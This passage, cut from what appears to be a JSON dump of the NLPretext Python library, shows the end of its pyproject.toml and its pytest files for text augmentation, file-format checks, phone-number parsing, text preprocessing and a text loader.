\">=3.5.4\"\nsphinx-gallery = \">=0.8.1\"\nsphinxcontrib-applehelp = \">=1.0.2\"\nsphinxcontrib-devhelp = \">=1.0.2\"\nsphinxcontrib-htmlhelp = \">=1.0.3\"\nsphinxcontrib-jsmath = \">=1.0.1\"\nsphinxcontrib-qthelp = \">=1.0.3\"\nsphinxcontrib-serializinghtml = \">=1.1.4\"\nsphinx-autodoc-typehints = \">=1.11.1\"\nsphinx_rtd_theme = \">=0.5.2\"\nsphinx-multiversion-pre-post-build = \">=0.2.4\"\n\n\n[tool.poetry.extras]\ntorch = [\"torch\"]\ndask = [\"dask\", \"distributed\"]\n\n[tool.black]\n# https://github.com/psf/black\nline-length = 100\ntarget-version = [\"py38\"]\n\n[tool.isort]\n# https://github.com/timothycrosley/isort/\nprofile = \"black\"\nknown_typing = \"typing,types,typing_extensions,mypy,mypy_extensions\"\nsections = \"FUTURE,TYPING,STDLIB,THIRDPARTY,FIRSTPARTY,LOCALFOLDER\"\ndefault_section = \"FIRSTPARTY\"\nforce_grid_wrap = 0\nline_length = 100\n\n\n[tool.ruff]\nignore = [\n    \"D100\",\n    \"D101\",\n    \"D106\",\n    \"D205\",\n    \"D400\",\n    \"D415\",\n    \"D401\",\n]\nline-length = 100\nselect = [\"B\", \"C\", \"D\", \"E\", \"F\", \"W\"]\n\n[tool.ruff.pydocstyle]\nconvention = \"numpy\"\n\n[tool.ruff.per-file-ignores]\n\"*cli.py\" = [\"D\", \"B008\"]\n\"*__init__.py\" = [\n    \"F401\",\n    \"D100\",\n    \"D101\",\n    \"D103\",\n    \"D104\",\n    \"D105\",\n    \"D106\",\n    \"D107\",\n]\n\"tests/*\" = [\"D\", \"E501\"]\n"
  },
  {
    "path": "references/.gitkeep",
    "content": ""
  },
  {
    "path": "tests/__init__.py",
    "content": ""
  },
  {
    "path": "tests/test_data_augmentation.py",
    "content": "import pytest\nfrom nlpretext.augmentation.text_augmentation import (\n    CouldNotAugment,\n    UnavailableAugmenter,\n    get_augmenter,\n    process_entities_and_text,\n)\n\n\n@pytest.mark.parametrize(\n    \"text, text_augmented, entities, expected\",\n    [\n        (\n            \"I want to buy a small black handbag.\",\n            \"I want to acquire a small black handbag\",\n            [\n                {\"entity\": \"Size\", \"word\": \"small\", \"startCharIndex\": 16, \"endCharIndex\": 21},\n                {\"entity\": \"Color\", \"word\": \"black\", \"startCharIndex\": 22, \"endCharIndex\": 27},\n                {\"entity\": \"Type\", \"word\": \"handbag\", \"startCharIndex\": 28, \"endCharIndex\": 35},\n            ],\n            {\"type\": str, \"entities\": [\"black\", \"handbag\", \"small\"]},\n        ),\n        (\n            \"I want to buy a small black handbag.\",\n            \"I would like to buy a black small handbag\",\n            [\n                {\"entity\": \"Size\", \"word\": \"small\", \"startCharIndex\": 16, \"endCharIndex\": 21},\n                {\"entity\": \"Color\", \"word\": \"black\", \"startCharIndex\": 22, \"endCharIndex\": 27},\n                {\"entity\": \"Type\", \"word\": \"handbag\", \"startCharIndex\": 28, \"endCharIndex\": 35},\n            ],\n            {\"type\": str, \"entities\": [\"black\", \"handbag\", \"small\"]},\n        ),\n    ],\n)\ndef test_process_entities_and_text_not_altered(text, text_augmented, entities, expected):\n    augmented_text, augmented_entities = process_entities_and_text(entities, text, text_augmented)\n    augmented_entities = sorted(el[\"word\"] for el in augmented_entities)\n    assert {\"type\": type(augmented_text), \"entities\": augmented_entities} == expected\n\n\n@pytest.mark.parametrize(\n    \"text, text_augmented, entities\",\n    [\n        (\n            \"I live in New York and I am looking for a lipstick\",\n            \"I live in New and York I an looking for a lipstick\",\n            [\n                {\"entity\": \"City\", \"word\": \"New York\", \"startCharIndex\": 10, \"endCharIndex\": 18},\n                {\"entity\": \"Type\", \"word\": \"bag\", \"startCharIndex\": 42, \"endCharIndex\": 50},\n            ],\n        )\n    ],\n)\ndef test_process_entities_and_text_altered(text, text_augmented, entities):\n    with pytest.raises(CouldNotAugment) as excinfo:\n        process_entities_and_text(entities, text, text_augmented)\n        assert (\n            str(excinfo.value) == \"Text was not correctly augmented because entities were altered\"\n        )\n\n\ndef test_get_augmenter():\n    method = \"ppdb_synonym\"\n    with pytest.raises(UnavailableAugmenter) as excinfo:\n        get_augmenter(method)\n        assert (\n            str(excinfo.value)\n            == \"The given augmenter is not supported. You must choose one \\\n               of the following: wordnet_synonym or aug_sub_bert\"\n        )\n"
  },
  {
    "path": "tests/test_file_loader.py",
    "content": "# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\n\nimport os\nimport re\n\nimport numpy as np\nimport pytest\nfrom nlpretext._utils.file_loader import check_text_file_format, detect_encoding\n\nTESTDOC_LATIN1 = \"J'aime les frites bien grasse étalon châpeau!\"\nTESTDOC_UTF8 = \"Un deuxième exemple de texte en utf-8 cette fois!\"\n\n\ndef create_files():\n    encoded_s = TESTDOC_LATIN1.encode(\"latin-1\")\n    with open(\"testdoc_latin1.txt\", \"wb\") as f:\n        f.write(encoded_s)\n\n    encoded_s = TESTDOC_UTF8.encode(\"utf-8\")\n    with open(\"testdoc_utf8.txt\", \"wb\") as f:\n        f.write(encoded_s)\n    return True\n\n\ndef test_detect_encoding():\n    create_files()\n    expected = {\"encoding\": \"ISO-8859-1\", \"confidence\": 0.73, \"language\": \"\"}\n    result = detect_encoding(\"testdoc_latin1.txt\")\n    np.testing.assert_equal(result, expected)\n    remove_files()\n\n\ndef remove_files():\n    os.remove(\"testdoc_latin1.txt\")\n    os.remove(\"testdoc_utf8.txt\")\n\n\n@pytest.mark.parametrize(\n    \"input_filepath, raising, expected_str\",\n    [\n        (\"hello.csv\", False, \"csv\"),\n        (\"folder/hello.csv\", False, \"csv\"),\n        (\"gs://folder/hello.csv\", False, \"csv\"),\n        (\"s3://folder/hello.csv\", False, \"csv\"),\n        (\"hdfs://folder/hello.csv\", False, \"csv\"),\n        (\"az://folder/hello.csv\", False, \"csv\"),\n        (\"wildcards/*.csv\", False, \"csv\"),\n        (\"compressed/gz/text.csv.gz\", False, \"csv\"),\n        (\"compressed/zip/text.csv.zip\", False, \"csv\"),\n        ([\"hello.csv\"], False, \"csv\"),\n        ([\"hello.csv\", \"compressed.csv.gz\"], False, \"csv\"),\n        ([\"hello.csv\", \"other/folder/hello.csv\"], False, \"csv\"),\n        (\"hello.json\", False, \"json\"),\n        (\"folder/hello.json\", False, \"json\"),\n        (\"gs://folder/hello.json\", False, \"json\"),\n        ([\"hello.json\", \"folder/hello.json\"], False, \"json\"),\n        (\"hello.txt\", False, \"txt\"),\n        (\"folder/hello.txt\", False, \"txt\"),\n        (\"gs://folder/hello.txt\", False, \"txt\"),\n        ([\"hello.txt\", \"gs://folder/hello.txt\"], False, \"txt\"),\n        (\"hello.parquet\", False, \"parquet\"),\n        (\"folder/hello.parquet\", False, \"parquet\"),\n        (\"gs://folder/hello.parquet\", False, \"parquet\"),\n        ([\"hello.parquet\", \"gs://folder/hello.parquet\"], False, \"parquet\"),\n        (\n            \"gs://folder/hello.notaformat\",\n            True,\n            \"Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted\",\n        ),\n        (\n            \"gs://folder/hello.gz\",\n            True,\n            \"Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted\",\n        ),\n        (\n            \"gs://folder/hello.zip\",\n            True,\n            \"Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted\",\n        ),\n        (\n            \"folder/*\",\n            True,\n            \"Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted\",\n        ),\n        (\n            [\"hello.txt\", \"gs://folder/hello.csv\"],\n            True,\n            re.escape(\"Multiple file formats found in file path list: ['txt', 'csv']\"),\n        ),\n    ],\n)\ndef test_check_text_file_format(input_filepath, raising, expected_str):\n    if raising:\n        with pytest.raises(ValueError, match=expected_str):\n            check_text_file_format(input_filepath)\n    else:\n        result = check_text_file_format(input_filepath)\n        assert result == expected_str\n"
  },
  {
    "path": "tests/test_phone_number.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\nimport nlpretext._utils.phone_number as phone\nfrom nlpretext._config.config import SUPPORTED_COUNTRY\n\n\ndef test_extract_phone_number():\n    input_str = \"(541) 754-3010 is a US. Phone\"\n    expected = [\"(541) 754-3010\", \"754-3010\"]\n    res = phone.extract_phone_numbers(input_str, countrylist=SUPPORTED_COUNTRY)\n    assert sorted(res) == sorted(expected)\n\n\ndef test_extract_phone_number_us():\n    input_str = \"(541) 754-3010 is a US. Phone\"\n    expected = [\"(541) 754-3010\"]\n    res = phone.extract_phone_numbers(input_str, countrylist=[\"US\"])\n    assert res == expected\n\n\ndef test_extract_phone_number_fr():\n    input_str = \"06.00.00.00.00 is a FR Phone\"\n    expected = [\"06.00.00.00.00\"]\n    res = phone.extract_phone_numbers(input_str, countrylist=[\"FR\"])\n    assert res == expected\n\n\ndef test_extract_phone_number_international():\n    input_str = \"+33600000000 is an international Phone number\"\n    expected = [\"+33600000000\"]\n    res = phone.extract_phone_numbers(input_str, countrylist=[\"US\", \"GB\", \"FR\", None])\n    assert res == expected\n\n\ndef test_phone_parser_us():\n    input_str = \"(541) 754-3010\"\n    expected = \"+1 541-754-3010\"\n    p = phone.PhoneParser()\n    p.parse_number(input_str, region_code=\"US\")\n    res = p.format_number(\"INTERNATIONAL\")\n    assert res == expected\n\n\ndef test_phone_parser_fr():\n    input_str = \"0600000000\"\n    expected = \"+33600000000\"\n    p = phone.PhoneParser()\n    p.parse_number(input_str, region_code=\"FR\")\n    res = p.format_number(\"E164\")\n    assert res == expected\n"
  },
  {
    "path": "tests/test_preprocessor.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n\n\nimport numpy as np\nimport pytest\nfrom nlpretext._config.config import SUPPORTED_COUNTRY\nfrom nlpretext._utils.stopwords import get_stopwords\nfrom nlpretext.basic.preprocess import (\n    filter_non_latin_characters,\n    fix_bad_unicode,\n    normalize_whitespace,\n    remove_accents,\n    remove_eol_characters,\n    remove_multiple_spaces_and_strip_text,\n    remove_punct,\n)\nfrom nlpretext.basic.preprocess import remove_stopwords as remove_stopwords_text\nfrom nlpretext.basic.preprocess import (\n    replace_currency_symbols,\n    replace_emails,\n    replace_numbers,\n    replace_phone_numbers,\n    replace_urls,\n    unpack_english_contractions,\n)\nfrom nlpretext.preprocessor import Preprocessor\nfrom nlpretext.social.preprocess import (\n    convert_emoji_to_text,\n    extract_emojis,\n    extract_hashtags,\n    extract_mentions,\n    remove_emoji,\n    remove_hashtag,\n    remove_html_tags,\n    remove_mentions,\n)\nfrom nlpretext.token.preprocess import remove_smallwords, remove_special_caracters_from_tokenslist\nfrom nlpretext.token.preprocess import remove_stopwords as remove_stopwords_token\nfrom nlpretext.token.preprocess import remove_tokens_with_nonletters\n\n\n@pytest.mark.parametrize(\n    \"text, expected_result\",\n    [\n        (\"ACV water + cinnamon + turmeric + cucumber + lemon. 👍🏻\", [\":thumbs_up_light_skin_tone:\"]),\n        (\"This is a text without emojis\", []),\n    ],\n)\ndef test_extract_emojis(text, expected_result):\n    result = extract_emojis(text)\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"text, expected_result\",\n    [\n        (\"I take care of my skin with @hellobody\", \"I take care of my skin with\"),\n        (\"This is a text without mentions\", \"This is a text without mentions\"),\n    ],\n)\ndef test_remove_mentions(text, expected_result):\n    result = remove_mentions(text)\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"text, expected_result\",\n    [\n        (\"I take care of my skin with @hellobody\", [\"@hellobody\"]),\n        (\"This is a text without mentions\", []),\n    ],\n)\ndef test_extract_mentions(text, expected_result):\n    result = extract_mentions(text)\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"text, expected_result\",\n    [\n        (\n            \"This is a text with <html> content of html tag </html>\",\n            \"This is a text with content of html tag\",\n        ),\n        (\"This is a text without html tags\", \"This is a text without html tags\"),\n    ],\n)\ndef test_remove_html_tags(text, expected_result):\n    result = remove_html_tags(text)\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"tokens_list, smallwords_threshold, expected_result\",\n    [\n        ([\"I\", \"take\", \"care\", \"of\", \"my\", \"skin\"], 2, [\"take\", \"care\", \"skin\"]),\n        (\n            [\"This\", \"text\", \"contains\", \"only\", \"long\", \"words\"],\n            2,\n            [\"This\", \"text\", \"contains\", \"only\", \"long\", \"words\"],\n        ),\n    ],\n)\ndef test_remove_smallwords(tokens_list, smallwords_threshold, expected_result):\n    result = remove_smallwords(tokens_list, smallwords_threshold)\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"text, expected_result\",\n    [\n        (\"this is a #hashtag in the middle of the text\", [\"#hashtag\"]),\n        (\"#this is a hashtag in the beginning of the text\", [\"#this\"]),\n        (\"this is a hashtag in the end of the #text\", [\"#text\"]),\n        (\"this is a text with no hashtag\", []),\n        (\"this is a text with #many #hashtags\", [\"#many\", \"#hashtags\"]),\n    ],\n)\ndef test_extract_hashtags(text, expected_result):\n    result = extract_hashtags(text)\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"text, expected_result\",\n    [\n        (\"this is a #hashtag in the middle of the text\", \"this is a in the middle of the text\"),\n        (\n            \"#this is a hashtag in the beginning of the text\",\n            \"is a hashtag in the beginning of the text\",\n        ),\n        (\"this is a hashtag in the end of the #text\", \"this is a hashtag in the end of the\"),\n        (\"this is a text with no hashtag\", \"this is a text with no hashtag\"),\n        (\"this is a text with #many #hashtags\", \"this is a text with\"),\n    ],\n)\ndef test_remove_hashtag(text, expected_result):\n    result = remove_hashtag(text)\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"text, expected_filtered_text\",\n    [\n        (\n            \"كلمات Learn 3 Arabic كلمات words EASILY- Vocabulary #1 تعلم ٣ جديدة\",\n            \"Learn 3 Arabic words EASILY Vocabulary 1\",\n        )\n    ],\n)\ndef test_filter_non_latin_characters(text, expected_filtered_text):\n    result = filter_non_latin_characters(text)\n    assert expected_filtered_text == result\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"hello   world\", \"hello world\"),\n        (\"\\n   hello world    \", \"hello world\"),\n        (\"----- hello\\tworld *****\", \"hello world\"),\n        (\"hello-world\", \"hello-world\"),\n        (\"hello - world\", \"hello world\"),\n    ],\n)\ndef test_remove_multiple_spaces_and_strip_text(input_str, expected_str):\n    result = remove_multiple_spaces_and_strip_text(input_str)\n    np.testing.assert_string_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"\\nhello world\", \" hello world\"),\n        (\"hello\\nworld\", \"hello world\"),\n        (\"hello world\\n\", \"hello world \"),\n    ],\n)\ndef test_remove_eol_characters(input_str, expected_str):\n    result = remove_eol_characters(input_str)\n    np.testing.assert_string_equal(result, expected_str)\n\n\ndef test_remove_tokens_with_nonletters():\n    input_tokens = [\"foo\", \"bar\", \"124\", \"34euros\"]\n    expected_output = [\"foo\", \"bar\"]\n    result = remove_tokens_with_nonletters(input_tokens)\n    np.testing.assert_array_equal(result, expected_output)\n\n\ndef test_remove_special_caracters_from_tokenslist():\n    input_tokens = [\"foo\", \"bar\", \"---\", \"'s\", \"#\"]\n    expected_output = [\"foo\", \"bar\", \"'s\"]\n    result = remove_special_caracters_from_tokenslist(input_tokens)\n    np.testing.assert_array_equal(result, expected_output)\n\n\ndef test_get_stopwords():\n    languages_to_test = [\"fr\", \"en\", \"ga\", \"zh\"]\n    for lang in languages_to_test:\n        result = get_stopwords(lang)\n        assert len(result) > 0 and isinstance(result, list)\n\n\n@pytest.mark.parametrize(\n    \"input_tokens, lang, expected_output\",\n    [([\"I\", \"like\", \"this\", \"song\", \"very\", \"much\", \"!\"], \"en\", [\"I\", \"song\", \"!\"])],\n)\ndef test_remove_stopwords_tokens(input_tokens, lang, expected_output):\n    result = remove_stopwords_token(input_tokens, lang)\n    np.testing.assert_array_equal(result, expected_output)\n\n\n@pytest.mark.parametrize(\n    \"input_text, lang, custom_stopwords, ignored_stopwords, expected_output\",\n    [\n        (\"I like this song very much !\", \"en\", None, None, \"I song !\"),\n        (\"Can I get a beer?\", \"en\", None, None, \"Can I beer ?\"),\n        (\"Je vous recommande ce film !\", \"fr\", None, None, \"Je recommande film !\"),\n        (\"je vous recommande ce film !\", \"fr\", None, None, \"recommande film !\"),\n        (\"Quiero una cerveza, por favor.\", \"es\", None, None, \"Quiero cerveza, favor.\"),\n        (\"je vous recommande ce film !\", \"fr\", [\"recommande\"], None, \"film !\"),\n        (\"Quiero una cerveza, por favor.\", \"es\", None, [\"una\"], \"Quiero una cerveza, favor.\"),\n        (\"je vous recommande ce film !\", \"fr\", [\"recommande\"], [\"je vous\"], \"je vous film !\"),\n        (\n            \"je vous recommande ce film !\",\n            \"fr\",\n            [\"recommande\"],\n            [\"recommande ce film\"],\n            \"recommande ce film !\",\n        ),\n    ],\n)\ndef test_remove_stopwords_text(\n    input_text, lang, custom_stopwords, ignored_stopwords, expected_output\n):\n    result = remove_stopwords_text(input_text, lang, custom_stopwords, ignored_stopwords)\n    np.testing.assert_array_equal(result, expected_output)\n\n\n@pytest.mark.parametrize(\n    \"input_text, lang, custom_stopwords, expected_output\",\n    [\n        (\"I like this song very much !\", \"en\", [\"song\"], \"I !\"),\n        (\n            \"Je vous recommande ce film la scène de fin est géniale !\",\n            \"fr\",\n            [\"film\", \"scène\"],\n            \"Je recommande fin géniale !\",\n        ),\n    ],\n)\ndef test_remove_custom_stopwords_text(input_text, lang, custom_stopwords, expected_output):\n    result = remove_stopwords_text(input_text, lang, custom_stopwords)\n    np.testing.assert_array_equal(result, expected_output)\n\n\ndef test_remove_accents():\n    input_str = \"éèëêàù\"\n    expected_str = \"eeeeau\"\n    result = remove_accents(input_str)\n    np.testing.assert_string_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"Les augmentations de rÃ©munÃ©rations\", \"Les augmentations de rémunérations\"),\n        (\n            \"rÃ©nover l'enquÃªte publique pour en faire un vrai outil  d'amÃ©nagement du territoire et de dialogue social\",\n            \"rénover l'enquête publique pour en faire un vrai outil  d'aménagement du territoire et de dialogue social\",\n        ),\n        (\n            \"Limitations de vitesse et sÃ©curitÃ© routiÃ¨re\",\n            \"Limitations de vitesse et sécurité routière\",\n        ),\n        (\"Pour un nouveau contrat citoyen\", \"Pour un nouveau contrat citoyen\"),\n        (\n            \"DÃ©velopper les dÃ©marches de budget participatif dans les collectivitÃ©s et associer les citoyens\"\n            \" dans la rÃ©alisation des projets\",\n            \"Développer les démarches de budget participatif dans les collectivités et associer les citoyens\"\n            \" dans la réalisation des projets\",\n        ),\n        (\"proportienelle\", \"proportienelle\"),\n        (\"Pour plus de dÃ©mocratie participative\", \"Pour plus de démocratie participative\"),\n        (\"Transparence de la vie public\", \"Transparence de la vie public\"),\n        (\"EgalitÃ© devant les infractions routiÃ¨res\", \"Egalité devant les infractions routières\"),\n    ],\n)\ndef test_fix_bad_unicode(input_str, expected_str):\n    result = fix_bad_unicode(input_str)\n    np.testing.assert_string_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [(\"  foo  \", \"foo\"), (\"  foo   bar  \", \"foo bar\")],\n)\ndef test_normalize_whitespace(input_str, expected_str):\n    result = normalize_whitespace(input_str)\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"I can't tell how we've done.\", \"I can not tell how we have done.\"),\n        (\"You're fired. She's nice.\", \"You are fired. She's nice.\"),\n        (\"Let's go!\", \"Let us go!\"),\n        (\"You've been missing\", \"You have been missing\"),\n        (\"I'm sure you're leaving\", \"I am sure you are leaving\"),\n        (\"We'll survive.\", \"We will survive.\"),\n    ],\n)\ndef test_unpack_english_contractions(input_str, expected_str):\n    result = unpack_english_contractions(input_str)\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\n            \"Wan't to contribute to NLPretext? read https://github.com/artefactory/NLPretext/blob/master/CONTRIBUTING.md\"\n            \" first\",\n            \"Wan't to contribute to NLPretext? read *URL* first\",\n        ),\n        (\n            \"If you go to http://internet.org, you will find a website hosted by FB.\",\n            \"If you go to *URL*, you will find a website hosted by FB.\",\n        ),\n        (\"Ishttps://internet.org/ available?\", \"Is*URL* available?\"),\n        (\"mailto:john.doe@artefact.com\", \"*URL*\"),\n    ],\n)\ndef test_replace_urls(input_str, expected_str):\n    result = replace_urls(input_str)\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"my email:john.doe@artefact.com\", \"my email:*EMAIL*\"),\n        (\"v543143@nwytg.net is a temporary email\", \"*EMAIL* is a temporary email\"),\n        (\"our emails used to be name.surname@artefact.is\", \"our emails used to be *EMAIL*\"),\n    ],\n)\ndef test_replace_emails(input_str, expected_str):\n    result = replace_emails(input_str)\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"mon 06: 0601020304\", \"mon 06: *PHONE*\"),\n        (\"mon 06: 06.01.02.03.04\", \"mon 06: *PHONE*\"),\n        (\"call me at +33601020304\", \"call me at *PHONE*\"),\n        (\"call me at +33 6 01 02 03 04\", \"call me at *PHONE*\"),\n        (\"call me at +33 601 020 304\", \"call me at *PHONE*\"),\n        (\n            \"if this unit test doesn't work, call 3615 and says 'HELP'\",\n            \"if this unit test doesn't work, call *PHONE* and says 'HELP'\",\n        ),\n        (\"(541) 754-0000 is a US. Phone\", \"*PHONE* is a US. Phone\"),\n        (\"+1-541-754-0000 is an international Phone\", \"*PHONE* is an international Phone\"),\n        (\"+1-541-754-0000 Dialed in the US\", \"*PHONE* Dialed in the US\"),\n        (\"+1-541-754-0000 Dialed from Germany\", \"*PHONE* Dialed from Germany\"),\n    ],\n)\ndef test_replace_phone_numbers(input_str, expected_str):\n    result = replace_phone_numbers(\n        input_str,\n        replace_with=\"*PHONE*\",\n        method=\"detection\",\n        country_to_detect=SUPPORTED_COUNTRY,\n    )\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"123, 3 petits chats\", \"*NUMBER*, *NUMBER* petits chats\"),\n        (\"Give me 45bucks!\", \"Give me *NUMBER*bucks!\"),\n        (\"call me at +33601020304\", \"call me at *NUMBER*\"),\n    ],\n)\ndef test_replace_numbers(input_str, expected_str):\n    result = replace_numbers(input_str)\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, param, expected_str\",\n    [\n        (\"Give me 23$\", None, \"Give me 23USD\"),\n        (\"Give me 23£\", None, \"Give me 23GBP\"),\n        (\"Give me 23 £\", None, \"Give me 23 GBP\"),\n        (\"Give me 23 €\", None, \"Give me 23 EUR\"),\n        (\n            \"¥ is both japanese yen and Chinese Renminbi\",\n            \"*CUR*\",\n            \"*CUR* is both japanese yen and Chinese Renminbi\",\n        ),\n    ],\n)\ndef test_replace_currency_symbols(input_str, param, expected_str):\n    result = replace_currency_symbols(input_str, replace_with=param)\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, param, expected_str\",\n    [\n        (\"Seriously...\", None, \"Seriously   \"),\n        (\"Seriously?\", None, \"Seriously \"),\n        (\"Seriously ?\", None, \"Seriously  \"),\n        (\"Seriously???\", None, \"Seriously   \"),\n        (\"Seriously?!\", None, \"Seriously  \"),\n        ('\"Seriously\"', None, \" Seriously \"),\n        (\"Seriously:\", None, \"Seriously \"),\n        (\"Seriously;\", None, \"Seriously \"),\n        (\"'Seriously'\", None, \" Seriously \"),\n        (\"'Seriously'\", \".,;\", \"'Seriously'\"),\n        (\"Seriously.,.\", \".,;\", \"Seriously \"),\n        (\"Seriously...\", \".,;\", \"Seriously \"),\n        (\"Seriously.!.\", \".,;\", \"Seriously ! \"),\n        (\"john.doe@artefact.com\", \".,;\", \"john doe@artefact com\"),\n        (\"john.doe@artefact.com\", None, \"john doe artefact com\"),\n        (\"john-doe@artefact.com\", None, \"john doe artefact com\"),\n    ],\n)\ndef test_remove_punct(input_str, param, expected_str):\n    result = remove_punct(input_str, marks=param)\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"⚽👌\", \"\"),\n        (\"🎅🏿⌚\", \"\"),\n        (\"🥖🍷🇫🇷\", \"\"),\n        (\"✊\", \"\"),\n        (\"Save 🐼 and 🐟\", \"Save  and \"),\n    ],\n)\ndef test_remove_emoji(input_str, expected_str):\n    result = remove_emoji(input_str)\n    assert len(result) == len(expected_str)\n    assert result == expected_str\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"⚽️👌\", \":soccer_ball::OK_hand:\"),\n        (\"🎅🏿⌚\", \":Santa_Claus_dark_skin_tone::watch:\"),\n        (\"🥖🍷🇫🇷\", \":baguette_bread::wine_glass::France:\"),\n        (\"✊\", \":raised_fist:\"),\n    ],\n)\ndef test_convert_emoji_to_text(input_str, expected_str):\n    result = convert_emoji_to_text(input_str)\n    np.testing.assert_equal(result, expected_str)\n\n\ndef test_custom_preprocess():\n    # Given\n    text = \"Some text with @mentions and #hashtags\"\n\n    preprocessor = Preprocessor()\n    preprocessor.pipe(remove_hashtag)\n    preprocessor.pipe(remove_mentions)\n    expected_result = remove_hashtag(text)\n    expected_result = remove_mentions(expected_result)\n\n    # When\n    result = preprocessor.run(text)\n\n    # Then\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\n            \"Some text with @mentions and whitespaces    and #hashtags\",\n            \"Some text with and whitespaces and\",\n        ),\n        (\"@twitteruser ✊\", \"\"),\n        (\"\", \"\"),\n    ],\n)\ndef test_apply_preprocessor(input_str, expected_str):\n    # Given\n    preprocessor = Preprocessor()\n\n    # When\n    result = preprocessor.run(input_str)\n\n    # Then\n    assert expected_str == result\n"
  },
  {
    "path": "tests/test_textloader.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n# mypy: disable-error-code=\"attr-defined\"\n\nfrom pathlib import Path\nfrom unittest.mock import MagicMock, patch\n\ntry:\n    import dask.bag as db\n    import dask.dataframe as dd\nexcept ImportError as e:\n    raise ImportError(\"please install dask: pip install dask[complete]\") from e\n\ntry:\n    import pandas as pd\nexcept ImportError as e:\n    raise ImportError(\"please install pandas: pip install pandas\") from e\n\nimport pytest\nfrom nlpretext.preprocessor import Preprocessor\nfrom nlpretext.textloader import TextLoader\nfrom pandas.testing import assert_frame_equal\n\n# pylint: disable=protected-access\n\n\n@patch(\"dask.bag.read_text\")\ndef test__read_text_txt_dask(mock_read_text):\n    # Given\n    files_path = \"some_path/to_read.txt\"\n    file_format = \"txt\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n    mock_read_text.return_value = db.from_sequence([\"This is a text \\n\", \"This is another text \\n\"])\n\n    expected_result = dd.from_pandas(\n        pd.DataFrame({text_column: [\"This is a text\", \"This is another text\"]}),\n        npartitions=2,\n    )\n\n    # When\n    dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)\n    actual_result = dummy_instance._read_text_txt(files_path)\n\n    # Then\n    mock_read_text.assert_called_once_with(files_path, encoding=encoding)\n    assert_frame_equal(expected_result.compute(), 